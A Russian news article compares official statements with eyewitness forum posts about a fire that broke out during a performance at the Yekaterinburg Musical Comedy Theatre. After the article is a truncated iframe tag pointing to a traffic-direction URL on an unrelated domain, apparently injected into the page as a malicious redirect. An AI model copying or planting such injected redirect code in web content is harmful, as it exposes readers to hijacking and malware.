Пожар в екатеринбургском Театре музкомедии: версия очевидцев

В субботу, 26 декабря в Екатеринбурге загорелся театр музыкальной комедии. Пожар начался прямо во время спектакля «Остров За». Во время возгорания в зрительном зале и за кулисами театра находилось несколько сот человек. Чудом никто из них не пострадал.
Согласно официальному заявлению руководства театра музкомедии, причиной пожара стало короткое замыкание, от которого вспыхнул задний занавес сцены.

Как сообщили в пресс-службе ГУ МЧС РФ по Свердловской области, все системы оповещения и управления эвакуацией сработали в штатном режиме. Первые пожарные расчеты прибыли к месту пожара уже через несколько минут, так как от здания ГУ МЧС РФ по Свердловской области театр отделяет несколько сот метров.

Как отметил пресс-секреталь ГУВД по Свердловской области Валерий Горелых, от огня пострадали только декорации, в зрительном зале разрушений нет — как только началось возгорание (примерно через полчаса после начала спектакля), на сцене опустили противопожарный занавес, чтобы уберечь зрителей от опасности.


Согласно информации, распространенной администрацией Театра музкомедии, эвакуация сотрудников и зрителей была произведена силами коллектива учреждения культуры. «Никакой паники среди зрителей не было, а эвакуация произошла быстро и организованно. В течение 10 минут публика покинула зал. Никто из зрителей и работников театра не пострадал. Согласно правилам противопожарной безопасности, все кулисы и декорации обработаны огнезащитным составом… Слаженная и грамотная работа противопожарных служб театра позволило справиться с возгоранием своими силами еще до приезда пожарных расчетов», — сообщается в его официальном сообщении театра.

Между тем совершенно иную точку зрения на произошедшее излагают жители Екатеринбурга, присутствовавшие на спектакле. Своими переживаниями они делятся на форуме городского портала Е1.

Согласно заявлениям зрителей спектакля, система пожарной безопасности в театре оказалась не на высоте. Декорации горели, а обязательный во всех учреждениях асбестовый противопожарный занавес не опустился вовсе.


«Я один из зрителей... Занавес вспыхнул за секунду... Громко объявили, чтоб артисты спустились со сцены, зрителям ни слова.... Противопожарный занавес при нас не опустился-не знаю через сколько времени он должен опуститься, но при нас ни ни!!! Электричество не вырубилось! это пппц ! Зрители молодцы- без паники все дружно пошли к выходу- никто не толкался...вышли быстро», — сообщает пользователь, пишущий под именем «Wollk».


«Враки!!! Никакого противопожарного занавеса не было. Когда задник заполыхал, зрители сами быстренько встали и пошли на выход. От администрации последовало только одно обращение к артистам, которые в этот момент были на сцене: «Девочки, быстро со сцены!» Администрация даже не озаботилась увеличить количество гардеробщиков на выдаче одежды, а там такие бабушки- божьи одуванчики, слабо видят, каждый номерок разглядывают, да еще и передвигаются не ахти как быстро. Особо нетерпеливые перепрыгивали в гардероб и сами свою одежду забирали», — комментирует официальную версию пользователь HRD.


«Никакого занавеса не опускалось! Жар от пламени даже в бельэтаже ощущался. Никакой сигнализации не слышал. Никто из сотрудников никого не эвакуировал. Все ушли сами, забрав вещи в гардеробе. Гардероб — это отдельная история. В одном из двух гардеробов погас свет. Фонарики нашлись не сразу. Но и они помогли мало: возраст гардеробщиц и пр. и свете не больно позволяет им оперативно работать. А тут такое! Народ полез в гардероб через перила. Бардак полный. Хорошо, что сцена загорелась, а не зал. Иначе караул был бы. Не научила Пермь!», — подтверждает пользователь A_Zha.

По информации пользователя амбассадор-921 эвакуация была осуществлена не администрацией театра, а несколькими сотрудниками МЧС, которые находились в театре в качестве зрителей. Если бы не эта счастливая случайность, события в екатеринбургском театре могли бы стать куда более драматичными.
<iframe src="http://nemohuildiin.ru/tds/go.

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Октябрь 2018    »
ПнВтСрЧтПтСбВс
1234567
891011121314
15161718192021
22232425262728
293031 

Контакты